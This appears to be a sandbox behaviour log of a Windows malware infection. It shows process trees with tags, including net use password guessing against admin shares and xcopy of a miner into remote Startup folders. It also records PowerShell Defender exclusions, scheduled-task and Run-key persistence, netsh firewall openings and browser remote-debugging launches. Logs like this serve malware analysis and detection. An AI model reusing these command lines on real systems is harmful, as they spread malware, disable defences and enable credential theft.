C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "user" /user:"user"6⤵PID:4608
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "user" /user:"user"6⤵PID:5848
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5388
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1605" /user:"user"6⤵PID:1832
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1605" /user:"user"6⤵PID:1952
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:892
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"user"6⤵PID:636
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"user"6⤵PID:6780
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1636
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"admin"6⤵PID:7396
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"admin"6⤵PID:4060
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4884
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"admin"6⤵PID:5536
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"admin"6⤵PID:952
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7572
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"admin"6⤵PID:6444
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"admin"6⤵PID:6368
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7096
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "admin" /user:"admin"6⤵PID:1600
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "admin" /user:"admin"6⤵PID:4188
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6364
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1605" /user:"admin"6⤵PID:7540
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1605" /user:"admin"6⤵PID:7024
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6532
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"admin"6⤵PID:4376
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"admin"6⤵PID:7832
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5248
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"àäìèíèñòðàòîð"6⤵PID:9032
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"àäìèíèñòðàòîð"6⤵PID:8488
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8568
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"àäìèíèñòðàòîð"6⤵PID:10176
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"àäìèíèñòðàòîð"6⤵PID:8112
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5828
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"àäìèíèñòðàòîð"6⤵PID:8676
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"àäìèíèñòðàòîð"6⤵PID:2336
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7896
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:3984
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:3336
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9664
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1605" /user:"àäìèíèñòðàòîð"6⤵PID:2608
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1605" /user:"àäìèíèñòðàòîð"6⤵PID:7476
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6988
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"àäìèíèñòðàòîð"6⤵PID:1168
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"àäìèíèñòðàòîð"6⤵PID:4992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "6⤵PID:7596
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.17⤵
- Discovers systems in the same network
PID:9908
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:9304
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5224
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:10172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:10224
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:10168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7080
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:8212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3972
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:3912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4208
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:9024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9392
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:9692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8712
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:10056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9004
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:9212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:8848
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:8016
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\z.exe"C:\Users\Admin\AppData\Local\Temp\a\z.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\a\steam.exe"C:\Users\Admin\AppData\Local\Temp\a\steam.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Users\Public\Discord.exe"C:\Users\Public\Discord.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Discord.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Discord.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:5824
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Public\Discord.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:5396
-
-
-
C:\Users\Public\Steam.exe"C:\Users\Public\Steam.exe"4⤵
- Executes dropped EXE
PID:5284
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\bitcoin3000.exe"C:\Users\Admin\AppData\Local\Temp\a\bitcoin3000.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5432 -
C:\Windows\SYSTEM32\cmd.execmd /c appbitcoin.bat4⤵PID:4388
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\savedecrypter.exe"C:\Users\Admin\AppData\Local\Temp\a\savedecrypter.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5576 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "IMAP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp23B0.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5244
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "IMAP Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp24CA.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:60
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Update.exe"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4688 -
C:\Users\Admin\AppData\Roaming\Update.exe"C:\Users\Admin\AppData\Roaming\Update.exe"4⤵PID:2164
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Update.exe" "Update.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\cann.exe"C:\Users\Admin\AppData\Local\Temp\a\cann.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3084 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\cann.exe"4⤵PID:8032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 6724⤵
- Program crash
PID:6196
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5088 -
C:\Windows\WindowsServices.exe"C:\Windows\WindowsServices.exe"4⤵PID:5996
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\bin2.exe"C:\Users\Admin\AppData\Local\Temp\a\bin2.exe"3⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\a\bin2Srv.exeC:\Users\Admin\AppData\Local\Temp\a\bin2Srv.exe4⤵PID:5548
-
C:\Program Files (x86)\Microsoft\DesktopLayer.exe"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"5⤵PID:5320
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"6⤵PID:724
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:724 CREDAT:17410 /prefetch:27⤵PID:828
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\cHSzTDjVl.exe"C:\Users\Admin\AppData\Local\Temp\a\cHSzTDjVl.exe"3⤵PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\a\ServerX.exe"C:\Users\Admin\AppData\Local\Temp\a\ServerX.exe"3⤵PID:512
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"4⤵PID:3908
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:1424
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"5⤵
- Modifies Windows Firewall
PID:6676
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:6920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\LinkedinTuVanDat.exe"C:\Users\Admin\AppData\Local\Temp\a\LinkedinTuVanDat.exe"3⤵PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\a\sas.exe"C:\Users\Admin\AppData\Local\Temp\a\sas.exe"3⤵PID:5028
-
-
C:\Users\Admin\AppData\Local\Temp\a\giania.exe"C:\Users\Admin\AppData\Local\Temp\a\giania.exe"3⤵PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\a\code.exe"C:\Users\Admin\AppData\Local\Temp\a\code.exe"3⤵PID:5136
-
-
C:\Users\Admin\AppData\Local\Temp\a\laserrr.exe"C:\Users\Admin\AppData\Local\Temp\a\laserrr.exe"3⤵PID:3100
-
C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe"C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe"4⤵PID:5360
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\pure.exe"C:\Users\Admin\AppData\Local\Temp\a\pure.exe"3⤵PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\a\GRAW.exe"C:\Users\Admin\AppData\Local\Temp\a\GRAW.exe"3⤵PID:6556
-
-
C:\Users\Admin\AppData\Local\Temp\a\svc.exe"C:\Users\Admin\AppData\Local\Temp\a\svc.exe"3⤵PID:8064
-
C:\Users\Admin\AppData\Local\Temp\temp_22331.exe"C:\Users\Admin\AppData\Local\Temp\temp_22331.exe"4⤵PID:7356
-
C:\Users\Admin\AppData\Local\Temp\temp_22331.exe"C:\Users\Admin\AppData\Local\Temp\temp_22331.exe"5⤵PID:7768
-
-
-
C:\Users\Admin\AppData\Local\Temp\temp_22370.exe"C:\Users\Admin\AppData\Local\Temp\temp_22370.exe"4⤵PID:6816
-
-
C:\Users\Admin\AppData\Local\Temp\temp_22377.exe"C:\Users\Admin\AppData\Local\Temp\temp_22377.exe"4⤵PID:7172
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\laser.exe"C:\Users\Admin\AppData\Local\Temp\a\laser.exe"3⤵PID:6208
-
-
C:\Users\Admin\AppData\Local\Temp\a\client2.exe"C:\Users\Admin\AppData\Local\Temp\a\client2.exe"3⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\a\client2.exe"C:\Users\Admin\AppData\Local\Temp\a\client2.exe"4⤵PID:7372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 8284⤵
- Program crash
PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\client.exe"C:\Users\Admin\AppData\Local\Temp\a\client.exe"3⤵PID:7644
-
C:\Users\Admin\AppData\Local\Temp\a\client.exe"C:\Users\Admin\AppData\Local\Temp\a\client.exe"4⤵PID:7748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 8324⤵
- Program crash
PID:7892
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"3⤵PID:8060
-
C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"4⤵PID:1940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 8244⤵
- Program crash
PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe"C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe"3⤵PID:6164
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe" "fusca%20game.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"3⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵PID:8092
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:6292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\jrirkfiweid.exe"C:\Users\Admin\AppData\Local\Temp\a\jrirkfiweid.exe"3⤵PID:868
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:3640 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff0670cc40,0x7fff0670cc4c,0x7fff0670cc585⤵PID:7396
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:7372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:2192 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff069846f8,0x7fff06984708,0x7fff069847185⤵PID:4608
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:1016
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\filfin1.exe"C:\Users\Admin\AppData\Local\Temp\a\filfin1.exe"3⤵PID:8020
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7676
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\cjrimgid.exe"C:\Users\Admin\AppData\Local\Temp\a\cjrimgid.exe"3⤵PID:5296
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:6236 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff0670cc40,0x7fff0670cc4c,0x7fff0670cc585⤵PID:3024
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:2792 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff2252cc40,0x7fff2252cc4c,0x7fff2252cc585⤵PID:7952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2260,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2236 /prefetch:25⤵PID:7536
-
-
